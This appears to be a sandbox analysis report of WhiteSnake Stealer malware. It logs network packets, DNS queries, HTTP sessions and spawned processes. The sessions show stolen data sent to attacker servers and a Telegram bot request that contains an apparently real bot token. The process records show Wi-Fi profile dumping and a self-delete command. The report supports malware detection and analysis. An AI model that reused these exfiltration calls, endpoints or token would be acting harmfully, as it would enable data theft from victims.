Oct 30, 2024 08:11:05.550884962 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.550894976 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.550928116 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.550966024 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551007986 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551018953 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551053047 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551062107 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551131010 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551141024 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551173925 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551183939 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551211119 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551265955 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551292896 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551341057 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551364899 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551423073 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:05.551456928 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:11:34.955008984 CET	80	49699	208.95.112.1	192.168.2.7
Oct 30, 2024 08:11:34.955122948 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:12:44.471932888 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:12:44.485652924 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:12:44.491357088 CET	8080	49700	41.216.183.9	192.168.2.7
Oct 30, 2024 08:12:44.491409063 CET	49700	8080	192.168.2.7	41.216.183.9
Oct 30, 2024 08:12:44.497384071 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.502774000 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.502851963 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.503120899 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.508409023 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.778341055 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:12:44.856662035 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.862364054 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862395048 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862405062 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862413883 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.862416029 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862452030 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862458944 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.862463951 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862476110 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.862500906 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.862519026 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.862525940 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862535954 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862587929 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.862612009 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862621069 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.862668037 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.867844105 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.867891073 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.867896080 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.867940903 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.867942095 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.867965937 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.867981911 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.867990971 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.868014097 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.868046045 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.915163040 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.915268898 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:44.963131905 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:44.963184118 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:45.011253119 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.011328936 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:45.059134960 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.059338093 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:45.107950926 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.107964039 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.108063936 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:45.113524914 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113535881 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113594055 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113610983 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113620996 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113647938 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113657951 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113675117 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113684893 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113696098 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113714933 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113738060 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113746881 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113761902 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113771915 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113847971 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113857985 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113869905 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113879919 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113893986 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113903999 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113912106 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113924026 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113940001 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.113965034 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.348720074 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.387753963 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:12:45.404051065 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:45.713327885 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.719126940 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:45.724697113 CET	8080	63169	209.38.221.184	192.168.2.7
Oct 30, 2024 08:12:45.728269100 CET	63169	8080	192.168.2.7	209.38.221.184
Oct 30, 2024 08:12:45.732650042 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:45.732686996 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:45.732800007 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:45.739662886 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:45.739676952 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:46.576720953 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:46.576806068 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:46.579348087 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:46.579361916 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:46.579644918 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:46.590341091 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:12:46.622126102 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:46.654304028 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:46.699333906 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:46.913985014 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:46.914084911 CET	443	63170	149.154.167.220	192.168.2.7
Oct 30, 2024 08:12:46.914132118 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:46.915333986 CET	63170	443	192.168.2.7	149.154.167.220
Oct 30, 2024 08:12:48.997096062 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:12:53.809663057 CET	49699	80	192.168.2.7	208.95.112.1
Oct 30, 2024 08:13:03.419018030 CET	49699	80	192.168.2.7	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 08:11:03.839150906 CET	53860	53	192.168.2.7	1.1.1.1
Oct 30, 2024 08:11:03.848479986 CET	53	53860	1.1.1.1	192.168.2.7
Oct 30, 2024 08:11:52.910669088 CET	53	49332	162.159.36.2	192.168.2.7
Oct 30, 2024 08:11:53.533575058 CET	53	58952	1.1.1.1	192.168.2.7
Oct 30, 2024 08:12:45.724031925 CET	63173	53	192.168.2.7	1.1.1.1
Oct 30, 2024 08:12:45.731437922 CET	53	63173	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 08:11:03.839150906 CET	192.168.2.7	1.1.1.1	0x2801	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:12:45.724031925 CET	192.168.2.7	1.1.1.1	0x4c5b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 08:11:03.848479986 CET	1.1.1.1	192.168.2.7	0x2801	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:12:45.731437922 CET	1.1.1.1	192.168.2.7	0x4c5b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

41.216.183.9:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	208.95.112.1	80	6500	C:\Users\user\AppData\Local\Temp\build.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:11:03.861440897 CET	85	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Oct 30, 2024 08:11:04.458051920 CET	199	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:11:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 29 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0a Data Ascii: United States173.254.250.78

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	41.216.183.9	8080	6500	C:\Users\user\AppData\Local\Temp\build.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:11:04.940112114 CET	254	OUT	POST /sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1 Host: 41.216.183.9:8080 Content-Length: 123400 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	63169	209.38.221.184	8080	6500	C:\Users\user\AppData\Local\Temp\build.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:12:44.503120899 CET	150	OUT	PUT /yLWFd_user%40927537_report.wsr HTTP/1.1 Host: 209.38.221.184:8080 Content-Length: 123400 Expect: 100-continue Connection: Keep-Alive
Oct 30, 2024 08:12:45.348720074 CET	25	IN	HTTP/1.1 100 Continue
Oct 30, 2024 08:12:45.713327885 CET	390	IN	HTTP/1.1 200 OK Content-Type: text/plain Server: Transfer.sh HTTP Server X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders X-Url-Delete: http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user@927537_report.wsr/fya15tfswvEaVoLj6wJL Date: Wed, 30 Oct 2024 07:12:45 GMT Content-Length: 71 Data Raw: 68 74 74 70 3a 2f 2f 32 30 39 2e 33 38 2e 32 32 31 2e 31 38 34 3a 38 30 38 30 2f 49 38 35 4f 41 7a 6a 37 4f 70 2f 79 4c 57 46 64 5f 66 72 6f 6e 74 64 65 73 6b 40 39 32 37 35 33 37 5f 72 65 70 6f 72 74 2e 77 73 72 Data Ascii: http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user@927537_report.wsr

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	63170	149.154.167.220	443	6500	C:\Users\user\AppData\Local\Temp\build.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:12:46 UTC	901	OUT	GET /bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-30 07:12:46 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 30 Oct 2024 07:12:46 GMT Content-Type: application/json Content-Length: 1096 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-30 07:12:46 UTC	1096	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 32 32 38 30 35 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 6f 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 68 69 74 65 6c 6f 67 67 65 72 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 37 33 34 37 32 38 36 35 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 6f 76 69 74 6f 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 44 6f 76 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 6f 76 69 74 6f 6f 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 37 32 33 36 36 2c 22 74 65 78 74 22 Data Ascii: {"ok":true,"result":{"message_id":40,"from":{"id":7722280561,"is_bot":true,"first_name":"logger","username":"whiteloggerbot"},"chat":{"id":7734728653,"first_name":"Dovitoo","last_name":"Dovo","username":"Dovitoo","type":"private"},"date":1730272366,"text"

Target ID:	0
Start time:	03:11:00
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x2b0000
File size:	315'904 bytes
MD5 hash:	D5B8AC0D80C99E7DDA0D9DF17C159F3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	03:11:00
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Local\Temp\build.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\build.exe"
Imagebase:	0x26b64c30000
File size:	228'440 bytes
MD5 hash:	ECC94919C7D1385D489961B21AF97328
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WhiteSnake, Description: Yara detected WhiteSnake Stealer, Source: 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	03:11:01
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Imagebase:	0x7ff615170000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	03:11:01
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	03:11:01
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61a3a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	03:11:02
Start date:	30/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff708790000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	7
Start time:	03:11:02
Start date:	30/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /R /C:"[ ]:[ ]"
Imagebase:	0x7ff7a7520000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	03:11:02
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Imagebase:	0x7ff615170000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	03:11:02
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	03:11:02
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61a3a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	11
Start time:	03:11:02
Start date:	30/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x7ff708790000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	12
Start time:	03:11:02
Start date:	30/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr "SSID BSSID Signal"
Imagebase:	0x7ff7a7520000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	24
Start time:	04:22:33
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"
Imagebase:	0x7ff615170000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	25
Start time:	04:22:33
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	04:22:33
Start date:	30/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61a3a0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	04:22:33
Start date:	30/10/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 3
Imagebase:	0x7ff6ad340000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true